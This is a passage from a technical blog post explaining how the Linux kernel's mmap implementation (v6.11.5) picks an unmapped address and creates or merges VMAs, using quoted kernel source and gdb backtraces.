			struct list_head *uf)
{
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></figcaption></figure><p>Okay, let&apos;s get back to it! For some context, upon entering <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code>:</p><ul><li><code>file</code> is NULL as we&apos;re mapping anonymous memory (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23">MAP_ANONYMOUS</a></code>), i.e. we&apos;re not mapping a file into our userspace process, but a chunk of &quot;anonymous&quot; physical memory. </li><li><code>vm_flags</code> stores the flags used for the virtual memory mapping we&apos;re creating. In this case, the caller <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">vm_mmap_pgoff()</a></code> does not specify any flags.</li><li><code>populate</code> is an <code>unsigned long*</code> initialised by <code>do_mmap()</code> and read by the caller, to determine if the mapping should be &quot;populated&quot; before returning to userspace. We&apos;ll touch more on the significance of that later, just know that a mapping is populated when <code>MAP_POPULATE</code> is set and <code>MAP_NONBLOCK</code> is not (so not our case study). </li><li><code>uf</code>, which relates to <code><a href="https://man7.org/linux/man-pages/man2/userfaultfd.2.html">userfaultfd(2)</a></code>, is a linked list initialised by the caller. It&apos;s not touched in <code>do_mmap()</code> and probably out of scope for this series anyway, so we&apos;ll ignore it for now. &#xA0;</li><li><code>addr</code>, <code>len</code>, <code>prot</code>, <code>flags</code>, <code>pgoff</code> all correspond to the same values we passed into <code>mmap(2)</code> from our userspace program. </li></ul><p>Okay, so what&apos;s the goal of this function? 
We know from exploring the previous functions in the call stack that the return value is the value that <code>mmap(2)</code> returns to userspace: on success, the userspace address of the mapping; on error, the <code>MAP_FAILED</code> value (<code>(void *) -1</code>). &#xA0;So where does <code>do_mmap()</code>&apos;s return value come from?</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{
	// SNIP
	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
	// SNIP
	return addr;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></figcaption></figure><p>Hm, so it looks like the rabbit hole goes deeper! <code>do_mmap()</code>&apos;s job is to process and sanitise its arguments so that they can be passed to <code>mmap_region()</code> which sets up the actual memory mapping (right??? surely there&apos;s no more calls). </p><p>More specifically, <code>do_mmap()</code> has a few responsibilities, including: </p><ul><li>Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user from exceeding the maximum mapping count defined by <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202">sysctl_max_map_count</a></code>. </li><li>Calculating the correct <code>vm_flags</code>, which are later applied to the <code>struct vm_area_struct</code> created for this mapping, based on various factors such as <code>prot</code>, <code>flags</code>, <code>mm-&gt;def_flags</code> etc.</li><li>Determining what userspace virtual address, stored in <code>addr</code>, is passed to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mmap_region()</a></code>.</li></ul><h4 id="finding-a-suitable-addr">Finding A Suitable <code>addr</code></h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/our_address.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><p>In order to find a suitable <code>addr</code> for our new memory mapping, broadly speaking, there are two general cases for <code>do_mmap()</code> to consider:</p><ul><li>Case A: <code>flags</code> includes <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code> </li><li>Case B: <code>flags</code> doesn&apos;t include <code>MAP_FIXED | MAP_FIXED_NOREPLACE</code> (our case)</li></ul><p>For Case A, the fixed <code>addr</code> specified by the 
user is passed to <code>mmap_region()</code>. However, the virtual address range spanned by this new mapping (<code>addr</code> to <code>addr + len</code>) might overlap existing ones. The default behaviour is to unmap the overlapped part. If <code>MAP_FIXED_NOREPLACE</code> is set though, <code>do_mmap()</code> will return <code>-EEXIST</code> if the new mapping would overlap any existing ones.</p><p>Otherwise, in case B, the kernel will determine the <code>addr</code>. The value of <code>addr</code> passed by the user is actually used as a hint about where to place the mapping. Note the &quot;hint&quot; <code>addr</code> is page aligned and rounded to a minimum value of <code>mmap_min_addr</code><sup>[1]</sup> by <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194">round_hint_to_min()</a></code> (which will happen in our case, as <code>addr == 0</code>). </p><p>In either case, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923">__get_unmapped_area()</a></code> is called to determine an appropriate <code>addr</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	/* Obtain the address to map to. we verify (or select) it and ensure
	 * that it represents a valid section of the address space.
	 */
	addr = __get_unmapped_area(file, addr, len, pgoff, flags, vm_flags);
	if (IS_ERR_VALUE(addr))
		return addr;</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1325">mm/mmap.c</a></figcaption></figure><p>To avoid getting too lost in the sauce, we&apos;ll skim over this function. Essentially it does some more sanitisation and checks. This includes another LSM hook (<code>mmap_addr</code>) on the <code>addr</code> yielded at the end of this function, as well as an arch specific check (<code>arch_mmap_check()</code>) which is currently only used by <code>arm</code> and <code>sparc</code>. </p><p>The approach used to get the unmapped area depends on a few factors: </p><ul><li>If it&apos;s a file, some file types may implement their own method to get an area. </li><li>If it&apos;s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we&apos;ll touch on this later)</li><li>Finally, if it&apos;s neither case (i.e. <code>MAP_PRIVATE | MAP_ANON</code>), it will use either <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926">thp_get_unmapped_area_vmflags()</a></code> (if <code>CONFIG_TRANSPARENT_HUGEPAGE=y</code>) or <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911">mm_get_unmapped_area_vmflags()</a></code> - this is the case we&apos;re interested in!</li></ul><p>Transparent Huge Pages (THPs) are a kernel feature for ... you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.</p><p>If we recall our <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">page primer</a>, pages are typically defined as 4KB (<code>0x1000</code> bytes) chunks of physical memory. A &quot;huge page&quot; here is 2M (<code>0x200000</code> bytes) in size. 
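</p><p>To make those sizes concrete, here&apos;s a tiny standalone sketch of the alignment arithmetic involved (the helper names are my own, not kernel API):</p>

```c
#include <stdint.h>

#define PAGE_SIZE_4K  0x1000UL    /* typical base page */
#define HPAGE_SIZE_2M 0x200000UL  /* x86_64 PMD-sized huge page */

/* Round addr down to a power-of-two alignment. */
static inline uint64_t align_down(uint64_t addr, uint64_t align)
{
	return addr & ~(align - 1);
}

/* Round addr up to a power-of-two alignment. */
static inline uint64_t align_up(uint64_t addr, uint64_t align)
{
	return (addr + align - 1) & ~(align - 1);
}
```

<p>For example, <code>align_down(0x7f1234567890, HPAGE_SIZE_2M)</code> gives <code>0x7f1234400000</code>, a 2M-aligned base that could back a huge page. </p><p>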
So the tl;dr here is that <code>thp_get_unmapped_area_vmflags()</code> will try to align the <code>addr</code> to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It&apos;s okay if this doesn&apos;t make total sense yet, as we&apos;ll cover paging in more detail soon!</p><p>Either way it will end up using <code>mm_get_unmapped_area_vmflags()</code>, so that&apos;s where we&apos;ll go next! Well, briefly, because this function then calls into an arch specific function depending on whether the <code>MMF_TOPDOWN</code> bit is set in our process&apos;s <code>mm-&gt;flags</code>. This determines whether we&apos;ll search from the top or bottom of our address space for an unmapped area.</p><p>On x86_64 this is set, which leads us to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch_get_unmapped_area_topdown_vmflags()</a></code>:</p><pre><code>(gdb) bt
#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at arch/x86/kernel/sys_x86_64.c:164
#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#3  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
    at mm/mmap.c:1325
#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121</code></pre><p>We made it! Okay, let&apos;s dig into how the address is fetched by walking through the function. There are various checks, but for brevity I&apos;ll focus on how the <code>addr</code> is found:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long
arch_get_unmapped_area_topdown_vmflags(struct file *filp, unsigned long addr0,
			  unsigned long len, unsigned long pgoff,
			  unsigned long flags, vm_flags_t vm_flags)
{
	struct vm_area_struct *vma;
	struct mm_struct *mm = current-&gt;mm;
	unsigned long addr = addr0;
	struct vm_unmapped_area_info info = {};
    
	// SNIP
    
	if (flags &amp; MAP_FIXED)
		return addr;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>If <code>MAP_FIXED</code> is set, <code>addr</code> is returned as-is, no questions asked.</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	if (addr) {
		addr &amp;= PAGE_MASK;                              [0]
		if (!mmap_address_hint_valid(addr, len))        [1]
			goto get_unmapped_area;

		vma = find_vma(mm, addr);                       [2]
		if (!vma || addr + len &lt;= vm_start_gap(vma))
			return addr;                            [3]
	}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>If a hint is set (i.e. <code>addr != 0</code>) then the function will check if that address range is free. It does this by first making sure the <code>addr</code> is page aligned [0] and then doing <em>another</em> validation check on the <code>addr</code> [1]. The comment for <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209">mmap_address_hint_valid()</a></code> does a good job describing why this check is needed!</p><p>To check if the address range our new mapping will use is free, it calls <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014">find_vma()</a></code> [2] - this function returns the first memory region at or AFTER <code>addr</code> in our <code>mm</code>. If no mapping is returned (<code>!vma</code>) then the address space after <code>addr</code> is free and we&apos;re good to go. </p><p>However, if there is a mapping somewhere at or after <code>addr</code>, we need to make sure it starts AFTER the end of our new mapping. It does this by comparing where our new mapping will end (<code>addr + len</code>) and the start address of the <code>vma</code> (<code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513">vm_start_gap(vma)</a></code>; the <code>gap</code> part is because the function factors in any potential padding). If there&apos;s no overlap, our mapping&apos;s area is unmapped and we can use the hint! [3]</p><figure class="kg-card kg-code-card"><pre><code class="language-C">struct vm_unmapped_area_info {
	unsigned long flags;        // informs search behaviour
	unsigned long length;       // length of the mapping in bytes
	unsigned long low_limit;    // lowest vaddr to start at
	unsigned long high_limit;   // highest vaddr to end at
	unsigned long align_mask;   // alignment mask the addr must satisfy
	unsigned long align_offset; // offset addr must have within align_mask
	unsigned long start_gap;    // minimum gap required before mapping
};
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">include/linux/mm.h</a></figcaption></figure><p>If the hint isn&apos;t valid or overlaps an existing mapping, the function will proceed to the <code>get_unmapped_area</code> label which will populate the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">struct vm_unmapped_area_info</a></code>, which describes the properties and constraints of our new mapping. </p><p>Remember, as we&apos;re searching topdown, <code>high_limit</code> defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in <code>mm-&gt;mmap_base</code> (the base user vaddr for topdown allocations). But what is this? </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/04/image.png" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="1434" height="664" srcset="https://sam4k.com/content/images/size/w600/2025/04/image.png 600w, https://sam4k.com/content/images/size/w1000/2025/04/image.png 1000w, https://sam4k.com/content/images/2025/04/image.png 1434w" sizes="(min-width: 720px) 720px"><figcaption>From <a href="https://www.slideshare.net/slideshow/process-address-space-the-way-to-create-virtual-address-page-table-of-userspace-application-251425396/251425396#3">these slides</a> by Adrian Huang</figcaption></figure><p>Let&apos;s remind ourselves of the x86_64 process virtual address space. We can see that <code>mm-&gt;mmap_base</code> sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the &quot;canonical&quot; address space and assumes the typical 47 bits (out of 64, on a 64-bit system) are used for the virtual address. </p><p>However, more bits may be used for the virtual address on some systems. 
So while the implementation defaults to <code>mmap_base</code> as the <code>high_limit</code>, if the hint is outside of this window, then the <code>high_limit</code> will instead be set to the true upper bounds of the user virtual address space (where <code>TASK_SIZE_MAX</code> defines the size of the user virtual address space). </p><figure class="kg-card kg-code-card"><pre><code class="language-C">	info.high_limit = get_mmap_base(0);
	// SNIP

	/*
	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
	 * in the full address space.
	 *
	 * !in_32bit_syscall() check to avoid high addresses for x32
	 * (and make it no op on native i386).
	 */
	if (addr &gt; DEFAULT_MAP_WINDOW &amp;&amp; !in_32bit_syscall())
		info.high_limit += TASK_SIZE_MAX - DEFAULT_MAP_WINDOW;
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></figcaption></figure><p>The <code>info</code> structure is then passed to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765">vm_unmapped_area(&amp;info)</a></code> which will do the search. As we specify <code>VM_UNMAPPED_AREA_TOPDOWN</code> in <code>flags</code>, it uses the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">unmapped_area_topdown(info)</a></code> implementation. </p><p>Using the magic of gdb, we can set a breakpoint to examine the <code>info</code> structure for our program&apos;s mapping to make sure everything aligns with our understanding:</p><pre><code>(gdb) p/x *((struct vm_unmapped_area_info*)info)
$2 = {
  flags = VM_UNMAPPED_AREA_TOPDOWN, 
  length = 0x1000,                  // our mapping len
  low_limit = 0x1000,               // default low_limit
  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
  align_mask = 0x0, 
  align_offset = 0x0, 
  start_gap = 0x0
}</code></pre><p>Now <code>unmapped_area_topdown()</code> has all the information it needs to search the address space from <code>high_limit</code> to <code>low_limit</code>, looking for a gap that fits our mapping of <code>len</code> (taking into account any alignment or gaps required before the mapping):</p><figure class="kg-card kg-code-card"><pre><code>static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
{
	// SNIP
	VMA_ITERATOR(vmi, current-&gt;mm, 0);
		
	// SNIP
    
	if (vma_iter_area_highest(&amp;vmi, low_limit, high_limit, length))
		return -ENOMEM;

	gap = vma_iter_end(&amp;vmi) - info-&gt;length;
	gap -= (gap - info-&gt;align_offset) &amp; info-&gt;align_mask;
	gap_end = vma_iter_end(&amp;vmi);
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">mm/mmap.c</a></figcaption></figure><p>Remember those maple trees we spoke about at the beginning? Well now it&apos;s all going to come in handy! <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114">VMA_ITERATOR()</a></code> is a macro used to initialise an iterator, <code>vmi</code>, for iterating (!) the vmas of a process (our <code>current-&gt;mm</code> in this case).</p><p>The main logic is then handled by the handy <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411">vma_iter_area_highest()</a></code>. This function wraps the advanced maple tree API, <code>mas_empty_area_rev()</code>, to find the first gap (i.e. a range not spanned by a node/vma) of <code>length</code> bytes, working from <code>high_limit</code> down to <code>low_limit</code>. And just like that we&apos;ve done our topdown search!</p><p>There are then some additional checks to make sure it conforms with the supplied <code>info</code>, plus some error handling, but that&apos;s the general gist of it. We did it! That&apos;s how we find an unused virtual address for our mapping ... at least for the default topdown case on an x86_64 system ...</p><p>For context, this is where we are in the callstack at this point:</p><pre><code>#0  0xffffffff81243e86 in unmapped_area_topdown (info=&lt;optimized out&gt;) at mm/mmap.c:1719
#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, 
    vm_flags=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:219
#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#5  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
    at mm/mmap.c:1325
#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83</code></pre><p>We&apos;re going to head back up to <code>do_mmap()</code> and cover the final bit of logic for the mapping process: <code>mmap_region()</code>. </p><h3 id="mmapregion"><code>mmap_region()</code></h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/this_is_it.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="480" height="360"></figure><figure class="kg-card kg-code-card"><pre><code>	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1468">mm/mmap.c</a></figcaption></figure><p>Okay! Can you believe we&apos;re still on the first system call of our &quot;simple&quot; program?! There&apos;s not long left now though! We&apos;re back in <code>do_mmap()</code> and the pieces are set:</p><ul><li><code>file</code> is NULL as we&apos;re mapping anonymous memory, not a file, in our address space</li><li><code>addr</code>, as we&apos;ve just painstakingly discovered, now contains a suitable virtual address for our mapping</li><li><code>len</code> is the length of our mapping in bytes</li><li><code>vm_flags</code> has been populated in <code>do_mmap()</code> from a combination of the <code>prot</code> and <code>flags</code> we passed to <code>mmap()</code> as well as the <code>mm-&gt;def_flags</code></li><li><code>pgoff</code> is zero, right? hah, well ... for anonymous <code>MAP_PRIVATE</code> mappings, <code>do_mmap()</code> will set <code>pgoff = addr &gt;&gt; PAGE_SHIFT;</code>. But <code>pgoff</code> is for file offsets, and we&apos;re not mapping a file?! 
The tl;dr here is that this acts as an identifier for anonymous vmas (I&apos;m sure we&apos;ll touch on this later).</li><li><code>uf</code>, the userfault list stuff, is still untouched and probably still out of scope for the post</li></ul><p>Now we&apos;re ready to jump into <code>mmap_region()</code>! The goal of this function is to do the actual &quot;mapping&quot; part of <code>mmap()</code>, which essentially means making sure our mapping (<code>len</code> bytes at <code>addr</code> with <code>vm_flags</code> properties) is represented by a <code>struct vm_area_struct</code> and stored in the <code>mm-&gt;mm_mt</code>. Sounds simple enough, right?</p><p>Well ... as you might expect, there are a lot of cases, edge cases and validation steps that need to be handled to do this correctly. For now we&apos;ll continue to focus on those relating specifically to anonymous mappings and our case study. </p><figure class="kg-card kg-code-card"><pre><code>unsigned long mmap_region(struct file *file, unsigned long addr,
		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
		struct list_head *uf)
{
	struct mm_struct *mm = current-&gt;mm;
	struct vm_area_struct *vma = NULL;
	struct vm_area_struct *next, *prev, *merge;
// SNIP
	VMA_ITERATOR(vmi, mm, addr);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Right off the bat we can see the <code>VMA_ITERATOR()</code> macro again, which will be doing a lot of heavy lifting in this function for navigating the <code>mm-&gt;mm_mt</code> maple tree. Note that it&apos;s initialised with our <code>addr</code>, so the iterator starts with <code>addr</code> as its index.</p><figure class="kg-card kg-code-card"><pre><code>	/* Check against address space limit. */
	if (!may_expand_vm(mm, vm_flags, len &gt;&gt; PAGE_SHIFT)) {
		unsigned long nr_pages;
		// SNIP     
	}

	/* Unmap any existing mapping in the area */
	error = do_vmi_munmap(&amp;vmi, mm, addr, len, uf, false);
	// SNIP</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Next we do some housekeeping. First is a check to make sure &quot;the calling process may expand its vm space by the passed number of pages&quot; ( <code>len &gt;&gt; PAGE_SHIFT</code> is a quick way to convert <code>len</code> bytes to the page count equivalent). This involves checking against any resource limits.</p><p>Then, we hit a quirk of <code>MAP_FIXED</code> behaviour we touched on earlier. Notably, when looking for an unmapped area, by default we&apos;ll get an <code>addr</code> that does not overlap any existing mappings for <code>len</code> bytes. However, if <code>MAP_FIXED</code> is passed, it will just use the <code>addr</code> passed by the user (as long as it&apos;s valid), regardless of overlaps.</p><p>If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by <code>do_vmi_munmap()</code>, which uses the vma iterator to unmap any vmas whose start address lies in <code>addr</code> to <code>addr + len</code>. Note that mappings can be &quot;sealed&quot;<sup><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">[2]</a></sup> and can&apos;t be unmapped like this, causing the current <code>mmap()</code> to fail. </p><figure class="kg-card kg-code-card"><pre><code class="language-C">	next = vma_next(&amp;vmi);
	prev = vma_prev(&amp;vmi);
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Next, the iterator is used to fetch the first vma from where the iterator starts (i.e. the next vma after <code>addr</code>) and the first vma prior to where the iterator starts (i.e. the first vma before <code>addr</code>). <code>mmap_region()</code> will then check the following cases:</p><ul><li>Can we merge the new mapping with the <code>next</code> vma instead of creating a new <code>vma</code>?</li><li>Can we merge the new OR merged mapping with the <code>prev</code> vma?</li><li>Some mappings, denoted by <code>VM_SPECIAL</code>, can&apos;t be merged. </li><li>If no merging is possible, allocate a new <code>vma</code>, initialise it and insert it into the <code>mm-&gt;mm_mt</code> </li></ul><h4 id="vma-merging">VMA Merging</h4><figure class="kg-card kg-code-card"><pre><code>	/* Attempt to expand an old mapping */
	/* Check next */
	if (next &amp;&amp; next-&gt;vm_start == end &amp;&amp; !vma_policy(next) &amp;&amp;
	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
				 NULL_VM_UFFD_CTX, NULL)) {</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new <code>struct vm_area_struct</code> for our new mapping. </p><p>Let&apos;s look at the first case: can we merge the new mapping with the <code>next</code> vma? First, there needs to be a <code>next</code> mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping is the start of <code>next</code>).</p><p>Then <code>!<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765">vma_policy(next)</a></code> makes sure <code>next</code> doesn&apos;t have its own specific NUMA policy (memory stuff, stored in <code>vma-&gt;vm_policy</code>). Finally <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813">can_vma_merge_before()</a></code> carries out the remaining checks, which basically involves:</p><ul><li>Checking if the <code>vm_flags</code>, <code>file</code> etc. are compatible. Also, if it has its own <code>vma-&gt;vm_ops-&gt;close</code> to be called when the vma is closed, it won&apos;t be merged. </li><li>If <code>next</code> is an anonymous vma cloned from a parent process, it won&apos;t be merged. </li></ul><p>If these checks are passed, <code>next</code> will be expanded to include our new mapping. Either way, similar checks will then be made for <code>prev</code>. If those checks pass, either:</p><ul><li><code>next</code> didn&apos;t merge, in which case we&apos;ll expand <code>prev</code> to include the new mapping</li><li><code>next</code> did merge, in which case <code>prev</code> will be expanded to include the new mapping AND <code>next</code>.</li></ul><p>If these checks fail, a vma will be allocated for our new mapping. 
</p><h4 id="vma-allocation">VMA Allocation</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/04/lonely.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x02]" loading="lazy" width="256" height="192"></figure><p>So, there&apos;s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and inserted into the <code>mm-&gt;mm_mt</code> tree:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">	vma = vm_area_alloc(mm);                           [0]
	// SNIP

	vma_iter_config(&amp;vmi, addr, end);                  [1]
	vma_set_range(vma, addr, end, pgoff);              [2]
	vm_flags_init(vma, vm_flags);                      [3]
	vma-&gt;vm_page_prot = vm_get_page_prot(vm_flags);    [4]

	if (file) {                                        [5]
		// SNIP
	} else if (vm_flags &amp; VM_SHARED) {                 [6]
		// SNIP
	} else {                                           [7]
		vma_set_anonymous(vma);
	}

	if (map_deny_write_exec(vma, vma-&gt;vm_flags)) {     [8]
		error = -EACCES;
		goto close_and_free_vma;
	}

	/* Allow architectures to sanity-check the vm_flags */
	error = -EINVAL;
	if (!arch_validate_flags(vma-&gt;vm_flags))
		goto close_and_free_vma;

	error = -ENOMEM;
	if (vma_iter_prealloc(&amp;vmi, vma))                  [9]
		goto close_and_free_vma;

	/* Lock the VMA since it is modified after insertion into VMA tree */
	vma_start_write(vma);                              [10]
	vma_iter_store(&amp;vmi, vma);                         [11]
	mm-&gt;map_count++;                                   [12]
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></figcaption></figure><p>Most of this is fairly straightforward: we allocate a new <code>struct vm_area_struct</code> [0], update the iterator [1], update the <code>vma</code> start/end/pgoff [2], its flags and protections [3][4].</p><p>Next, there&apos;s some mapping-type-specific initialisation depending on whether it&apos;s a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909">vma_set_anonymous()</a></code> simply sets <code>vma-&gt;vm_ops = NULL</code>. This field being NULL is what marks it as a (private) anonymous vma (as seen by the equivalent <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914">vma_is_anonymous()</a></code> check). </p><p>There is then a security check [8], <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192">map_deny_write_exec()</a></code>, which will 